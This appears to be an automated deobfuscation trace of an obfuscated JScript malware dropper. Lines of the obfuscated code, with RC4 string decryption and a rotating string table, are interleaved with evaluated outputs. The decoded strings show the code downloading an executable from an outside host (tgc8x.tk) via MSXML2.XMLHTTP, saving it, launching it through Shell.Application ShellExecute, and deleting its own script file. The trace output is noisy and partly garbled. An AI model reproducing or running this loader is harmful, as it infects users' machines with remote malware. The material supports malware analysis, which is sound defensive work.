                                                                                                                                      • decodeURIComponent("%c3%86%14%63%56%c3%a6%c3%9f%c2%8a%22%19%c3%ba%40%61") ➔ "\xc6\x14cV\xe6\xdf\x8a"\x19\xfa@a"
                                                                                                                                      • decodeURIComponent("%c2%a4%c3%9c%7e%1f%3f%29") ➔ "\xa4\xdc~\x1f?)"
                                                                                                                                      • decodeURIComponent("%61%7b%29%c2%9a%6c%6e%3c") ➔ "a{)\x9aln<"
                                                                                                                                      20
                                                                                                                                      };
                                                                                                                                        21
                                                                                                                                        var _0x50992b = function (_0x13f8d0, _0xbb7100) {
                                                                                                                                        • function (_0xe99d3f, _0x318392).eDkGFb("AXxcQSkOWRG","dOyh") ➔ "]\x0e\xe58\xef"
                                                                                                                                        • function (_0xe99d3f, _0x318392).eDkGFb("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=","SewZ") ➔ undefined
                                                                                                                                        • function (_0xe99d3f, _0x318392).eDkGFb("WOZcHCkvkCo+WOXZnuxcKKbM","dOyh") ➔ "\xba\x9e\xda\xb9\xa9\xfdl\xa8\xf12;D"
                                                                                                                                        • function (_0xe99d3f, _0x318392).eDkGFb("w1vrmSoRW7VdJCkJWOVdGaldVq","SewZ") ➔ "\x02RvYjD\x89\x91\xc3\xec\xe0c"
                                                                                                                                        • function (_0xe99d3f, _0x318392).eDkGFb("nmkoFSotW53cKq","SewZ") ➔ "m\x89Y\xb8\."
                                                                                                                                        • function (_0xe99d3f, _0x318392).eDkGFb("EMpdGSkmdSoXsCk+W6u",")E2i") ➔ "\x0b1\xd1E\xa5\x9e5\xf3\xaf"
                                                                                                                                        • function (_0xe99d3f, _0x318392).eDkGFb("https://tgc8x.tk/tt/VNZVNCXKKJSF.exe","CZq%") ➔ undefined
                                                                                                                                        • function (_0xe99d3f, _0x318392).eDkGFb("W4yuy1BdPSoFWOOIgCo6qge","dOyh") ➔ "\xf0\x0f,\xc6\xb1\xae\x95\xbf\xadZ;C"
                                                                                                                                        • function (_0xe99d3f, _0x318392).eDkGFb("WQtdNh4FpYK","SewZ") ➔ "\xfd\xdbYt\xbe\x96"
                                                                                                                                        • function (_0xe99d3f, _0x318392).eDkGFb("yxSPWPPSBJW","SewZ") ➔ "8|\x0e\xf1\xed\xd1x"
                var _0x16801f = [], _0x374a29 = 0x0, _0x319ed0, _0x3b90fe = '';
                _0x13f8d0 = _0x12b176 ( _0x13f8d0 );
                                                                                                                                          • _0x12b176("AXxcQSkOWRG") ➔ "k\x15\xaa\xa8\xb8"
                                                                                                                                          • _0x12b176("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=") ➔ undefined
                                                                                                                                          • _0x12b176("WOZcHCkvkCo+WOXZnuxcKKbM") ➔ "\x8c\x85\x95)\xfe\x8cs5E\x92@f"
                                                                                                                                          • _0x12b176("w1vrmSoRW7VdJCkJWOVdGaldVq") ➔ "[UQ2\xeb\xfb\xcd\xa3\x8b\xc0\x02\xfd"
                                                                                                                                          • _0x12b176("nmkoFSotW53cKq") ➔ "4\x8e~\xd3\xdd\x91"
                                                                                                                                          • _0x12b176("EMpdGSkmdSoXsCk+W6u") ➔ "zc\xc2\x8c\x0e\xf1I\xbe\xe5"
                                                                                                                                          • _0x12b176("https://tgc8x.tk/tt/VNZVNCXKKJSF.exe") ➔ undefined
                                                                                                                                          • _0x12b176("W4yuy1BdPSoFWOOIgCo6qge") ➔ "\xc6\x14cV\xe6\xdf\x8a"\x19\xfa@a"
                                                                                                                                          • _0x12b176("WQtdNh4FpYK") ➔ "\xa4\xdc~\x1f?)"
                                                                                                                                          • _0x12b176("yxSPWPPSBJW") ➔ "a{)\x9aln<"
                var _0x2e4578;
                // RC4 key scheduling: fill the 256-entry state table _0x16801f, then permute it with the key _0xbb7100
                for ( _0x2e4578 = 0x0 ; _0x2e4578 < 0x100 ; _0x2e4578 ++ )
                {
                    _0x16801f[_0x2e4578] = _0x2e4578;
                }
                for ( _0x2e4578 = 0x0 ; _0x2e4578 < 0x100 ; _0x2e4578 ++ )
                {
                    _0x374a29 = ( _0x374a29 + _0x16801f[_0x2e4578] + _0xbb7100['charCodeAt'] ( _0x2e4578 % _0xbb7100['length'] ) ) % 0x100, _0x319ed0 = _0x16801f[_0x2e4578], _0x16801f[_0x2e4578] = _0x16801f[_0x374a29], _0x16801f[_0x374a29] = _0x319ed0;
                }
                _0x2e4578 = 0x0, _0x374a29 = 0x0;
                // RC4 keystream generation: XOR each character of _0x13f8d0 with the next keystream byte
                for ( var _0x10039f = 0x0 ; _0x10039f < _0x13f8d0['length'] ; _0x10039f ++ )
                {
                    _0x2e4578 = ( _0x2e4578 + 0x1 ) % 0x100, _0x374a29 = ( _0x374a29 + _0x16801f[_0x2e4578] ) % 0x100, _0x319ed0 = _0x16801f[_0x2e4578], _0x16801f[_0x2e4578] = _0x16801f[_0x374a29], _0x16801f[_0x374a29] = _0x319ed0, _0x3b90fe += String['fromCharCode'] ( _0x13f8d0['charCodeAt'] ( _0x10039f ) ^ _0x16801f[( _0x16801f[_0x2e4578] + _0x16801f[_0x374a29] ) % 0x100] );
                }
                return _0x3b90fe;
            };
            _0x5099['eDkGFb'] = _0x50992b, _0x304024 = arguments, _0x5099['GLbovs'] = ! ! [];
        }
        // Decoded strings are cached in _0x304024 under the key _0x199af3, so each table entry is decrypted only once
        var _0x1bce3b = _0x3974d[0x0], _0x199af3 = _0xe99d3f + _0x1bce3b, _0x2d5575 = _0x304024[_0x199af3];
        return ! _0x2d5575 ? ( _0x5099['IyeLFh'] === undefined && ( _0x5099['IyeLFh'] = ! ! [] ), _0x59ecb7 = _0x5099['eDkGFb'] ( _0x59ecb7, _0x318392 ), _0x304024[_0x199af3] = _0x59ecb7 ) : _0x59ecb7 = _0x2d5575, _0x59ecb7;
                                                                                                                                                                                • function (_0xe99d3f, _0x318392).eDkGFb("AXxcQSkOWRG","dOyh") ➔ "]\x0e\xe58\xef"
                                                                                                                                                                                • function (_0xe99d3f, _0x318392).eDkGFb("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=","SewZ") ➔ undefined
                                                                                                                                                                                • function (_0xe99d3f, _0x318392).eDkGFb("WOZcHCkvkCo+WOXZnuxcKKbM","dOyh") ➔ "\xba\x9e\xda\xb9\xa9\xfdl\xa8\xf12;D"
                                                                                                                                                                                • function (_0xe99d3f, _0x318392).eDkGFb("w1vrmSoRW7VdJCkJWOVdGaldVq","SewZ") ➔ "\x02RvYjD\x89\x91\xc3\xec\xe0c"
                                                                                                                                                                                • function (_0xe99d3f, _0x318392).eDkGFb("nmkoFSotW53cKq","SewZ") ➔ "m\x89Y\xb8\."
                                                                                                                                                                                • function (_0xe99d3f, _0x318392).eDkGFb("EMpdGSkmdSoXsCk+W6u",")E2i") ➔ "\x0b1\xd1E\xa5\x9e5\xf3\xaf"
                                                                                                                                                                                • function (_0xe99d3f, _0x318392).eDkGFb("https://tgc8x.tk/tt/VNZVNCXKKJSF.exe","CZq%") ➔ undefined
                                                                                                                                                                                • function (_0xe99d3f, _0x318392).eDkGFb("W4yuy1BdPSoFWOOIgCo6qge","dOyh") ➔ "\xf0\x0f,\xc6\xb1\xae\x95\xbf\xadZ;C"
                                                                                                                                                                                • function (_0xe99d3f, _0x318392).eDkGFb("WQtdNh4FpYK","SewZ") ➔ "\xfd\xdbYt\xbe\x96"
                                                                                                                                                                                • function (_0xe99d3f, _0x318392).eDkGFb("yxSPWPPSBJW","SewZ") ➔ "8|\x0e\xf1\xed\xd1x"
    }, _0x5099 ( _0x304024, _0x5125dd );
}
var _0x445216 = _0x5099, _0x56566c = _0xe99d;
( function (_0x33d5a0, _0x4566fe) {
                                                                                                                                                                                      • (function _0x3974(),418135) ➔ undefined
                                                                                                                                                                                      • (function _0x3974(),418135) ➔ undefined
    var _0x29007c = _0xe99d, _0x24698b = _0x5099, _0x529399 = _0x33d5a0 ( );
                                                                                                                                                                                      • _0x3974() ➔ dXnloCodW7pcV8k0,uqtdR8kPceWHW5tdNW,ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsSoAc0BdH0GfCq,279BGVghm,WQLhE3xcLSkBWQ5naCorW6xdUq,bYVcLCkh,uSkzW6xdIW,ECoyWQGeWQzGhSkBtMlcPW,RzXUsr,W4SFgdRcImkKWOiD,abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=,w1vrmSoRW7VdJCkJWOVdGaldVq,WQtdNh4FpYK,AJirxSkZWOCCya9JWPhdJG,shift,WPBcTCoPW5misfRdSN7dL8oPbq,W4BcISoRW5qtgXxcIx3cPCog,EMpdGSkmdSoXsCk+W6u,428748eDivLq,q2iIW7/cNf9lcq/cV8k6WOb2,fromCharCode,vUkl,ksRdUCk9FSoRWOxcRCoVrsJdTd3dMuXWWOJdRmo+W4PIiZNdHCoUp8kjW7FdTSkaW4z6WRhcUwaO,length,WOVdSmovWONdJZGXzKNdMfxcOmo2rq,Bhsp,4(*W,qCVKfY,WRNdUKyZlrG,W5pdICkQkCk1WQ53WQZdRCo6tSoA,W6LlWOT6F3X+W7JdK8od,DeleteFile,W4ZdJrRdRue,421620Dulpsf,282elZIVv,W6JcQSofWRK,Scripting.FileSystemObject,BQ9o,1268392teACcP,Send,WPtdR14Ihq9nfCkFdKFcSCoRW7ddMeKt,AXxcQSkOWRG,WOZcHCkvkCo+WOXZnuxcKKbM,W4yuy1BdPSoFWOOIgCo6qge,bs19WQHMoNZdH8oAW5eX,W69VWRvm,10MQXdOq,AJ3cTmowW6WowIz1WO5WW4O,WR8BoCkPbXTiCCo9cW,WQ3cNSkvBW,8ApAyti,WQquW65/F8ol,W)L8,https://tgc8x.tk/tt/VNZVNCXKKJSF.exe,A1dcS8k4WPddG8kRWRq2W5j8FJmjumkfhSkMwmoDcCorW6rjW7tdNrW,WPRdHSkOWQrddhC,charCodeAt,push,76392yWuOtG,W73dVr7dRxtcHSkIW4xcK27cLSoWWOa,5991OPUtAM,13285611Ofkcqp,ScriptFullName,Position,nmkoFSotW53cKq,yxSPWPPSBJW,AJCsxmk1WOXXxYPeWPJdSmoB
    while (! ! [ ] )
    {
        try
        {
            // Checksum computed from parseInt() of string-table entries; it is compared against _0x4566fe
            var _0x529eac = - parseInt ( _0x24698b ( 0xf4, 'dOyh' ) ) / 0x1 + parseInt ( _0x29007c ( 0xea ) ) / 0x2 * ( - parseInt ( _0x29007c ( 0x104 ) ) / 0x3 ) + parseInt ( _0x24698b ( 0xd5, 'SewZ' ) ) / 0x4 + - parseInt ( _0x24698b ( 0x10a, 'SewZ' ) ) / 0x5 + parseInt ( _0x29007c ( 0xe9 ) ) / 0x6 + - parseInt ( _0x24698b ( 0xdb, ')E2i' ) ) / 0x7 * ( parseInt ( _0x24698b ( 0xff, 'CZq%' ) ) / 0x8 ) + parseInt ( _0x29007c ( 0x105 ) ) / 0x9 * ( parseInt ( _0x29007c ( 0xf6 ) ) / 0xa );
                                                                                                                                                                                              • _0x5099(244,"dOyh") ➔ "]\x0e\xe58\xef"
                                                                                                                                                                                              • parseInt("]\x0e\xe58\xef") ➔ NaN
                                                                                                                                                                                              • _0xe99d(234) ➔ "DeleteFile"
                                                                                                                                                                                              • parseInt("DeleteFile") ➔ NaN
                                                                                                                                                                                              • _0xe99d(260) ➔ "push"
                                                                                                                                                                                              • parseInt("push") ➔ NaN
                                                                                                                                                                                              • _0x5099(213,"SewZ") ➔ undefined
                                                                                                                                                                                              • _0x5099(244,"dOyh") ➔ "\xba\x9e\xda\xb9\xa9\xfdl\xa8\xf12;D"
                                                                                                                                                                                              • parseInt("\xba\x9e\xda\xb9\xa9\xfdl\xa8\xf12;D") ➔ NaN
                                                                                                                                                                                              • _0xe99d(234) ➔ "W4ZdJrRdRue"
                                                                                                                                                                                              • parseInt("W4ZdJrRdRue") ➔ NaN
                                                                                                                                                                                              • _0xe99d(260) ➔ "76392yWuOtG"
                                                                                                                                                                                              • parseInt("76392yWuOtG") ➔ 76392
                                                                                                                                                                                              • _0x5099(213,"SewZ") ➔ "\x02RvYjD\x89\x91\xc3\xec\xe0c"
                                                                                                                                                                                              • parseInt("\x02RvYjD\x89\x91\xc3\xec\xe0c") ➔ NaN
                                                                                                                                                                                              • _0x5099(266,"SewZ") ➔ "m\x89Y\xb8\."
                                                                                                                                                                                              • parseInt("m\x89Y\xb8\.") ➔ NaN
                                                                                                                                                                                              • _0xe99d(233) ➔ "DeleteFile"
                                                                                                                                                                                              • parseInt("DeleteFile") ➔ NaN
                                                                                                                                                                                              • _0x5099(219,")E2i") ➔ "\x0b1\xd1E\xa5\x9e5\xf3\xaf"
                                                                                                                                                                                              • parseInt("\x0b1\xd1E\xa5\x9e5\xf3\xaf") ➔ 1
                                                                                                                                                                                              • _0x5099(255,"CZq%") ➔ undefined
                                                                                                                                                                                              • _0x5099(244,"dOyh") ➔ "\xf0\x0f,\xc6\xb1\xae\x95\xbf\xadZ;C"
                                                                                                                                                                                              • parseInt("\xf0\x0f,\xc6\xb1\xae\x95\xbf\xadZ;C") ➔ NaN
                                                                                                                                                                                              • _0xe99d(234) ➔ "421620Dulpsf"
                                                                                                                                                                                              • parseInt("421620Dulpsf") ➔ 421620
                                                                                                                                                                                              • _0xe99d(260) ➔ "W73dVr7dRxtcHSkIW4xcK27cLSoWWOa"
                                                                                                                                                                                              • parseInt("W73dVr7dRxtcHSkIW4xcK27cLSoWWOa") ➔ NaN
                                                                                                                                                                                              • _0x5099(213,"SewZ") ➔ "\xfd\xdbYt\xbe\x96"
                                                                                                                                                                                              • parseInt("\xfd\xdbYt\xbe\x96") ➔ NaN
                                                                                                                                                                                              • _0x5099(266,"SewZ") ➔ "8|\x0e\xf1\xed\xd1x"
                                                                                                                                                                                              • parseInt("8|\x0e\xf1\xed\xd1x") ➔ 8
                                                                                                                                                                                              • _0xe99d(233) ➔ "W4ZdJrRdRue"
                                                                                                                                                                                              • parseInt("W4ZdJrRdRue") ➔ NaN
                                                                                                                                                                                              • _0x24698b(219,")E2i") ➔ undefined
                                                                                                                                                                                              • _0x24698b(244,"dOyh") ➔ "36281KcZnqJ"
                                                                                                                                                                                              • parseInt("36281KcZnqJ") ➔ 36281
                                                                                                                                                                                              • _0xe99d(234) ➔ "282elZIVv"
                                                                                                                                                                                              • parseInt("282elZIVv") ➔ 282
                                                                                                                                                                                              • _0xe99d(260) ➔ "5991OPUtAM"
                                                                                                                                                                                              • parseInt("5991OPUtAM") ➔ 5991
                                                                                                                                                                                              • _0x24698b(213,"SewZ") ➔ "356528XRGOsP"
                                                                                                                                                                                              • parseInt("356528XRGOsP") ➔ 356528
                                                                                                                                                                                              • _0x24698b(266,"SewZ") ➔ "3057435mbhznI"
                                                                                                                                                                                              • parseInt("3057435mbhznI") ➔ 3057435
                                                                                                                                                                                              • _0x29007c(233) ➔ "421620Dulpsf"
                                                                                                                                                                                              • parseInt("421620Dulpsf") ➔ 421620
                                                                                                                                                                                              • _0x24698b(219,")E2i") ➔ "2016707DEhGJz"
                                                                                                                                                                                              • parseInt("2016707DEhGJz") ➔ 2016707
                                                                                                                                                                                              • _0x24698b(255,"CZq%") ➔ "8ApAyti"
                                                                                                                                                                                              • parseInt("8ApAyti") ➔ 8
                                                                                                                                                                                              • _0x29007c(261) ➔ "13285611Ofkcqp"
                                                                                                                                                                                              • parseInt("13285611Ofkcqp") ➔ 13285611
                                                                                                                                                                                              • _0x29007c(246) ➔ "10MQXdOq"
                                                                                                                                                                                              • parseInt("10MQXdOq") ➔ 10
            if (_0x529eac === _0x4566fe)
                break;
            else
                _0x529399['push'](_0x529399['shift']());
        } catch (_0x1ed55f) {
            _0x529399['push'](_0x529399['shift']());
        }
    }
}(_0x3974, 0x66157));
function _0x1c3e(_0x27f080, _0x17fea0) {
                                                                                                                                                                                                                    • _0x1c3e(140) ➔ "463900CaNtRp"
                                                                                                                                                                                                                    • _0x1c3e(134) ➔ "xSkvWPCOWOniFvTXeCkMbCkL"
                                                                                                                                                                                                                    • _0x1c3e(140) ➔ "1268392teACcP"
                                                                                                                                                                                                                    • _0x1c3e(134) ➔ "5QEmMYO"
                                                                                                                                                                                                                    • _0x1c3e(138) ➔ "76392yWuOtG"
                                                                                                                                                                                                                    • _0x1c3e(128) ➔ "279BGVghm"
                                                                                                                                                                                                                    • _0x1c3e(131) ➔ "Scripting.FileSystemObject"
                                                                                                                                                                                                                    • _0x1c3e(142) ➔ "\VNZVNCXKKJSF.exe"
                                                                                                                                                                                                                    • _0x1c3e(135) ➔ "MSXML2.XMLHTTP"
                                                                                                                                                                                                                    • _0x1c3e(117) ➔ "Open"
    var _0x35b3aa = _0x4a61();
                                                                                                                                                                                                                    • _0x4a61() ➔ Open,DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,AJ3cTmowW6WowIz1WO5WW4O,W4yuy1BdPSoFWOOIgCo6qge,SaveToFile,WQ3cNSkvBW,W4BcISoRW5qtgXxcIx3cPCog,W5pdICkQkCk1WQ53WQZdRCo6tSoA,279BGVghm,vcFcV8kjWRZdHmk4WROea0xcUa,WOZcHCkvkCo+WOXZnuxcKKbM,Scripting.FileSystemObject,https://tgc8x.tk/tt/VNZVNCXKKJSF.exe,995898DfgeKn,5QEmMYO,MSXML2.XMLHTTP,Type,W7pdMCoine3dQ8oDW6rTaczvl1e,76392yWuOtG,WRRcG8o6,1268392teACcP,xSkvWPCOWOniFvTXeCkMbCkL,\VNZVNCXKKJSF.exe,CreateObject,Position,W4NdNCkFW6WLcfzu,Shell.Application,463900CaNtRp,W4BcLCo0oJRcS8kdW4SaWO1/WQaN,W73dVr7dRxtcHSkIW4xcK27cLSoWWOa,W5xdQmkrpSkhW6vhWRhdVSoZACoyWRXJimko,W4SFgdRcImkKWOiD,Send
                                                                                                                                                                                                                    • _0x4a61() ➔ Shell.Application,463900CaNtRp,W4BcLCo0oJRcS8kdW4SaWO1/WQaN,W73dVr7dRxtcHSkIW4xcK27cLSoWWOa,W5xdQmkrpSkhW6vhWRhdVSoZACoyWRXJimko,W4SFgdRcImkKWOiD,Send,Open,DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,AJ3cTmowW6WowIz1WO5WW4O,W4yuy1BdPSoFWOOIgCo6qge,SaveToFile,WQ3cNSkvBW,W4BcISoRW5qtgXxcIx3cPCog,W5pdICkQkCk1WQ53WQZdRCo6tSoA,279BGVghm,vcFcV8kjWRZdHmk4WROea0xcUa,WOZcHCkvkCo+WOXZnuxcKKbM,Scripting.FileSystemObject,https://tgc8x.tk/tt/VNZVNCXKKJSF.exe,995898DfgeKn,5QEmMYO,MSXML2.XMLHTTP,Type,W7pdMCoine3dQ8oDW6rTaczvl1e,76392yWuOtG,WRRcG8o6,1268392teACcP,xSkvWPCOWOniFvTXeCkMbCkL,\VNZVNCXKKJSF.exe,CreateObject,Position,W4NdNCkFW6WLcfzu
    return _0x1c3e = function (_0x366407, _0x13f8d0) {
                                                                                                                                                                                                                      • _0x1c3e(140,undefined) ➔ "463900CaNtRp"
                                                                                                                                                                                                                      • _0x1c3e(134,undefined) ➔ "xSkvWPCOWOniFvTXeCkMbCkL"
                                                                                                                                                                                                                      • _0x1c3e(140,undefined) ➔ "1268392teACcP"
                                                                                                                                                                                                                      • _0x1c3e(134,undefined) ➔ "5QEmMYO"
                                                                                                                                                                                                                      • _0x1c3e(138,undefined) ➔ "76392yWuOtG"
                                                                                                                                                                                                                      • _0x1c3e(128,undefined) ➔ "279BGVghm"
                                                                                                                                                                                                                      • _0x1c3e(131,undefined) ➔ "Scripting.FileSystemObject"
                                                                                                                                                                                                                      • _0x1c3e(142,undefined) ➔ "\VNZVNCXKKJSF.exe"
                                                                                                                                                                                                                      • _0x1c3e(135,undefined) ➔ "MSXML2.XMLHTTP"
                                                                                                                                                                                                                      • _0x1c3e(117,undefined) ➔ "Open"
        _0x366407 = _0x366407 - 0x6e;
        var _0xbb7100 = _0x35b3aa[_0x366407];
        return _0xbb7100;
    }, _0x1c3e(_0x27f080, _0x17fea0);
}
var _0x155c25 = _0x5b6c, _0x115fc7 = _0x1c3e;
(function (_0x16801f, _0x374a29) {
                                                                                                                                                                                                                                  • (function _0x4a61(),265012) ➔ undefined
    var _0x16324c = _0xe99d, _0x2e5130 = _0x5099, _0x319ed0 = _0x1c3e, _0x3b90fe = _0x5b6c, _0x2e4578 = _0x16801f();
                                                                                                                                                                                                                                  • _0x4a61() ➔ Send,Open,DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,AJ3cTmowW6WowIz1WO5WW4O,W4yuy1BdPSoFWOOIgCo6qge,SaveToFile,WQ3cNSkvBW,W4BcISoRW5qtgXxcIx3cPCog,W5pdICkQkCk1WQ53WQZdRCo6tSoA,279BGVghm,vcFcV8kjWRZdHmk4WROea0xcUa,WOZcHCkvkCo+WOXZnuxcKKbM,Scripting.FileSystemObject,https://tgc8x.tk/tt/VNZVNCXKKJSF.exe,995898DfgeKn,5QEmMYO,MSXML2.XMLHTTP,Type,W7pdMCoine3dQ8oDW6rTaczvl1e,76392yWuOtG,WRRcG8o6,1268392teACcP,xSkvWPCOWOniFvTXeCkMbCkL,\VNZVNCXKKJSF.exe,CreateObject,Position,W4NdNCkFW6WLcfzu,Shell.Application,463900CaNtRp,W4BcLCo0oJRcS8kdW4SaWO1/WQaN,W73dVr7dRxtcHSkIW4xcK27cLSoWWOa,W5xdQmkrpSkhW6vhWRhdVSoZACoyWRXJimko,W4SFgdRcImkKWOiD
    while (!![]) {
        try {
            var _0x10039f = -parseInt(_0x3b90fe(0x7a, _0x2e5130(0xeb, 'OS$Q'))) / 0x1 + -parseInt(_0x3b90fe(0x7b, _0x2e5130(0xce, 'EzL#'))) / 0x2 + -parseInt(_0x3b90fe(0x8d, _0x16324c(0xfc))) / 0x3 + parseInt(_0x319ed0(0x8c)) / 0x4 * (-parseInt(_0x319ed0(0x86)) / 0x5) + parseInt(_0x3b90fe(0x81, _0x16324c(0xe2))) / 0x6 * (parseInt(_0x3b90fe(0x91, 'mh&D')) / 0x7) + -parseInt(_0x319ed0(0x8a)) / 0x8 * (parseInt(_0x319ed0(0x80)) / 0x9) + parseInt(_0x3b90fe(0x89, _0x16324c(0xdd))) / 0xa;
                                                                                                                                                                                                                                          • _0x2e5130(235,"OS$Q") ➔ "m*X5"
                                                                                                                                                                                                                                          • _0x5b6c(122,"m*X5") ➔ undefined
                                                                                                                                                                                                                                          • _0x2e5130(235,"OS$Q") ➔ "m*X5"
                                                                                                                                                                                                                                          • _0x5b6c(122,"m*X5") ➔ " ,8f`\xfa\xa1\xfd?\xf9g\x02"
                                                                                                                                                                                                                                          • parseInt(" ,8f`\xfa\xa1\xfd?\xf9g\x02") ➔ NaN
                                                                                                                                                                                                                                          • _0x2e5130(206,"EzL#") ➔ "RY1%"
                                                                                                                                                                                                                                          • _0x5b6c(123,"RY1%") ➔ "s\xa8\xc3G!k\xbdq; Ki"
                                                                                                                                                                                                                                          • parseInt("s\xa8\xc3G!k\xbdq; Ki") ➔ NaN
                                                                                                                                                                                                                                          • _0x16324c(252) ➔ "W)L8"
                                                                                                                                                                                                                                          • _0x5b6c(141,"W)L8") ➔ "\xa91Q!\x89\xce\xc7\xf6>\xcb\x91\xf7\xd1"
                                                                                                                                                                                                                                          • parseInt("\xa91Q!\x89\xce\xc7\xf6>\xcb\x91\xf7\xd1") ➔ NaN
                                                                                                                                                                                                                                          • _0x1c3e(140) ➔ "463900CaNtRp"
                                                                                                                                                                                                                                          • parseInt("463900CaNtRp") ➔ 463900
                                                                                                                                                                                                                                          • _0x1c3e(134) ➔ "xSkvWPCOWOniFvTXeCkMbCkL"
                                                                                                                                                                                                                                          • parseInt("xSkvWPCOWOniFvTXeCkMbCkL") ➔ NaN
                                                                                                                                                                                                                                          • _0x16324c(226) ➔ "4(*W"
                                                                                                                                                                                                                                          • _0x5b6c(129,"4(*W") ➔ undefined
                                                                                                                                                                                                                                          • _0x2e5130(235,"OS$Q") ➔ "m*X5"
                                                                                                                                                                                                                                          • _0x5b6c(122,"m*X5") ➔ "\xd2\x8e\x12\xc6"\xb2jr~hb\xdc"
                                                                                                                                                                                                                                          • parseInt("\xd2\x8e\x12\xc6"\xb2jr~hb\xdc") ➔ NaN
                                                                                                                                                                                                                                          • _0x2e5130(206,"EzL#") ➔ "RY1%"
                                                                                                                                                                                                                                          • _0x5b6c(123,"RY1%") ➔ undefined
                                                                                                                                                                                                                                          • _0x2e5130(235,"OS$Q") ➔ "m*X5"
                                                                                                                                                                                                                                          • _0x5b6c(122,"m*X5") ➔ undefined
                                                                                                                                                                                                                                          • _0x2e5130(235,"OS$Q") ➔ "m*X5"
                                                                                                                                                                                                                                          • _0x5b6c(122,"m*X5") ➔ undefined
                                                                                                                                                                                                                                          • _0x2e5130(235,"OS$Q") ➔ "m*X5"
                                                                                                                                                                                                                                          • _0x5b6c(122,"m*X5") ➔ undefined
                                                                                                                                                                                                                                          • _0x2e5130(235,"OS$Q") ➔ "m*X5"
                                                                                                                                                                                                                                          • _0x3b90fe(122,"m*X5") ➔ undefined
                                                                                                                                                                                                                                          • _0x2e5130(235,"OS$Q") ➔ "m*X5"
                                                                                                                                                                                                                                          • _0x3b90fe(122,"m*X5") ➔ undefined
                                                                                                                                                                                                                                          • _0x2e5130(235,"OS$Q") ➔ "m*X5"
                                                                                                                                                                                                                                          • _0x3b90fe(122,"m*X5") ➔ undefined
                                                                                                                                                                                                                                          • _0x2e5130(235,"OS$Q") ➔ "m*X5"
                                                                                                                                                                                                                                          • _0x3b90fe(122,"m*X5") ➔ "\xad\xd2O\xdb\x91\xd5\xc4\xa3V\xfa\x04\xefs\x0b"
                                                                                                                                                                                                                                          • parseInt("\xad\xd2O\xdb\x91\xd5\xc4\xa3V\xfa\x04\xefs\x0b") ➔ NaN
                                                                                                                                                                                                                                          • _0x2e5130(206,"EzL#") ➔ "RY1%"
                                                                                                                                                                                                                                          • _0x3b90fe(123,"RY1%") ➔ undefined
                                                                                                                                                                                                                                          • parseInt("\xe4\x88}") ➔ NaN
                                                                                                                                                                                                                                          • _0x2e5130(206,"EzL#") ➔ "RY1%"
                                                                                                                                                                                                                                          • _0x3b90fe(123,"RY1%") ➔ undefined
                                                                                                                                                                                                                                          • parseInt("\x00\x9e\x10\xc7_vd\x1cJ\xeb\x84\xbf\xf9") ➔ NaN
                                                                                                                                                                                                                                          • _0x2e5130(206,"EzL#") ➔ "RY1%"
                                                                                                                                                                                                                                          • _0x3b90fe(123,"RY1%") ➔ undefined
                                                                                                                                                                                                                                          • parseInt("\x97\xd6\x18\x03\xf96O\x13") ➔ NaN
                                                                                                                                                                                                                                          • _0x2e5130(206,"EzL#") ➔ "RY1%"
                                                                                                                                                                                                                                          • _0x3b90fe(123,"RY1%") ➔ undefined
                                                                                                                                                                                                                                          • parseInt("\x98\x9es\xd5\xe6\x8d\x9a\x8c;w]\x1a{") ➔ NaN
                                                                                                                                                                                                                                          • _0x2e5130(206,"EzL#") ➔ "RY1%"
                                                                                                                                                                                                                                          • _0x3b90fe(123,"RY1%") ➔ "\x02\xd0H\x83\xabal\x81\xed\xf1\x9d\xff\xcf"
                                                                                                                                                                                                                                          • parseInt("\x02\xd0H\x83\xabal\x81\xed\xf1\x9d\xff\xcf") ➔ NaN
                                                                                                                                                                                                                                          • _0x16324c(252) ➔ "W)L8"
                                                                                                                                                                                                                                          • _0x3b90fe(141,"W)L8") ➔ undefined
                                                                                                                                                                                                                                          • parseInt("\xa3\xf6\x99\x02\xa8\xb8\xbb\x82\xa8\x94\xb4J\xdc") ➔ NaN
                                                                                                                                                                                                                                          • _0x2e5130(206,"EzL#") ➔ "RY1%"
                                                                                                                                                                                                                                          • _0x3b90fe(123,"RY1%") ➔ "*\xc5\xc7PX\x02\x89\xf5\x80lb\xd7\xf3.\x82\xd9"
                                                                                                                                                                                                                                          • parseInt("*\xc5\xc7PX\x02\x89\xf5\x80lb\xd7\xf3.\x82\xd9") ➔ NaN
                                                                                                                                                                                                                                          • _0x16324c(252) ➔ "W)L8"
                                                                                                                                                                                                                                          • _0x3b90fe(141,"W)L8") ➔ undefined
                                                                                                                                                                                                                                          • parseInt("\x8b\xe3\x16\xd1[\xdb^\xf6\xc5 Kb\xe09\x8e\x89") ➔ NaN
                                                                                                                                                                                                                                          • _0x2e5130(206,"EzL#") ➔ "RY1%"
                                                                                                                                                                                                                                          • _0x3b90fe(123,"RY1%") ➔ "42NTWCLY"
                                                                                                                                                                                                                                          • parseInt("42NTWCLY") ➔ 42
                                                                                                                                                                                                                                          • _0x16324c(252) ➔ "W)L8"
                                                                                                                                                                                                                                          • _0x3b90fe(141,"W)L8") ➔ undefined
                                                                                                                                                                                                                                          • parseInt("\x95\x14\x9f\xd5T\x9a\x9bZ") ➔ NaN
                                                                                                                                                                                                                                          • _0x2e5130(206,"EzL#") ➔ "RY1%"
                                                                                                                                                                                                                                          • _0x3b90fe(123,"RY1%") ➔ undefined
                                                                                                                                                                                                                                          • parseInt("\x95\x10\xe2\xb83\xe9\x94b\x0b\x11{\xc5") ➔ NaN
                                                                                                                                                                                                                                          • _0x16324c(252) ➔ "W)L8"
                                                                                                                                                                                                                                          • _0x3b90fe(141,"W)L8") ➔ undefined
